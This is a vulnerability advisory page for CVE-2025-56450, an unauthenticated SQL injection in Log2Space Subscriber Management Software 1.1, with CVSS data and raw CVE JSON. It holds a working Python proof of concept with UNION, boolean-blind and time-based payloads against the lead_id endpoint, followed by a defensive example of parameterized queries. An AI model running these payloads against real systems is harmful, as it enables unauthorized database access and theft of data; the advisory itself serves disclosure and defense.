Security Vulnerability Report
CVE-2025-56450 CVSS 6.5 MEDIUM

Published: 2025-10-21 15:15:39
Last Modified: 2026-04-15 00:35:42

Description

Log2Space Subscriber Management Software 1.1 is vulnerable to unauthenticated SQL injection via the `lead_id` parameter in the `/l2s/api/selfcareLeadHistory` endpoint. A remote attacker can exploit this by sending a specially crafted POST request, resulting in the execution of arbitrary SQL queries. The backend fails to sanitize the user input, allowing enumeration of database schemas, table names, and potentially leading to full database compromise.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Log2Space Subscriber Management Software 1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-56450 PoC - Log2Space SQL Injection via lead_id parameter
# Unauthenticated SQL Injection in /l2s/api/selfcareLeadHistory endpoint

import requests

TARGET_URL = "http://target-host/l2s/api/selfcareLeadHistory"

# Payload 1: UNION-based injection to enumerate database version
payload_version = "' UNION SELECT @@version,2,3-- -"

# Payload 2: UNION-based injection to enumerate table names
payload_tables = (
    "' UNION SELECT GROUP_CONCAT(table_name),2,3 "
    "FROM information_schema.tables "
    "WHERE table_schema=database()-- -"
)

# Payload 3: Boolean-based blind injection test
payload_boolean = "1' AND 1=1-- -"
payload_boolean_false = "1' AND 1=2-- -"

# Payload 4: Time-based blind injection
payload_time = "1' AND SLEEP(5)-- -"


def exploit(target_url, payload):
    """Send malicious POST request with injected lead_id parameter."""
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0"
    }
    data = {"lead_id": payload}
    try:
        response = requests.post(target_url, headers=headers, data=data, timeout=30)
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response Length: {len(response.text)}")
        print(f"[+] Response Body:\n{response.text[:2000]}")
        return response
    except Exception as e:
        print(f"[-] Error: {e}")
        return None


if __name__ == "__main__":
    print("[*] Testing CVE-2025-56450 - Log2Space SQL Injection")
    print(f"[*] Target: {TARGET_URL}")

    print("\n[+] Attempting UNION-based injection to get DB version...")
    exploit(TARGET_URL, payload_version)

    print("\n[+] Attempting to enumerate tables...")
    exploit(TARGET_URL, payload_tables)

    print("\n[+] Attempting boolean-based blind injection...")
    exploit(TARGET_URL, payload_boolean)
    exploit(TARGET_URL, payload_boolean_false)

    print("\n[+] Attempting time-based blind injection...")
    exploit(TARGET_URL, payload_time)
```
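The following is an added example, not Log2Space code and not part of the original PoC: it shows the CWE-89 pattern the description names (a request value concatenated into SQL text) beside a hardened form, using the boolean payload pair from the PoC as input. The `lead_history` table, its columns, all function names, the in-memory SQLite stand-in, and the rule that lead ids are plain integers are assumptions; the product's real schema and backend are not given on this page.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for a lead-history table (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE lead_history (lead_id INTEGER, note TEXT)")
    db.executemany(
        "INSERT INTO lead_history VALUES (?, ?)",
        [(1, "called customer"), (1, "site survey booked"), (2, "quote sent")],
    )
    return db


def history_concatenated(db, lead_id):
    """CWE-89 pattern: the request value becomes part of the SQL statement text."""
    sql = ("SELECT note FROM lead_history WHERE lead_id = '" + lead_id
           + "' ORDER BY rowid")
    return [row[0] for row in db.execute(sql)]


def history_parameterized(db, lead_id):
    """Hardened: allow-list the format first, then bind the value as data."""
    # Assumption: lead ids are short, plain ASCII integers.
    if not (lead_id.isascii() and lead_id.isdigit() and len(lead_id) <= 18):
        raise ValueError("lead_id must be numeric")
    sql = "SELECT note FROM lead_history WHERE lead_id = ? ORDER BY rowid"
    return [row[0] for row in db.execute(sql, (int(lead_id),))]


if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1' AND 1=1-- -", "1' AND 1=2-- -"):
        # In the concatenated form the two boolean payloads give different
        # results, which shows the input is being parsed as SQL.
        print(repr(value), "concatenated ->", history_concatenated(db, value))
        try:
            print(repr(value), "parameterized ->", history_parameterized(db, value))
        except ValueError as exc:
            print(repr(value), "parameterized -> rejected:", exc)
```

The differing answers to the true and false conditions in the concatenated version are the signal that input reaches the SQL parser; the hardened version rejects both inputs before any query runs.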

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56450", "sourceIdentifier": "[email protected]", "published": "2025-10-21T15:15:38.830", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Log2Space Subscriber Management Software 1.1 is vulnerable to unauthenticated SQL injection via the `lead_id` parameter in the `/l2s/api/selfcareLeadHistory` endpoint. A remote attacker can exploit this by sending a specially crafted POST request, resulting in the execution of arbitrary SQL queries. The backend fails to sanitize the user input, allowing enumeration of database schemas, table names, and potentially leading to full database compromise."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/apboss123/CVE-2025-56450/blob/main/README.md", "source": "[email protected]"}, {"url": "https://reference1.example.com/selfcare/login", "source": "[email protected]"}]}}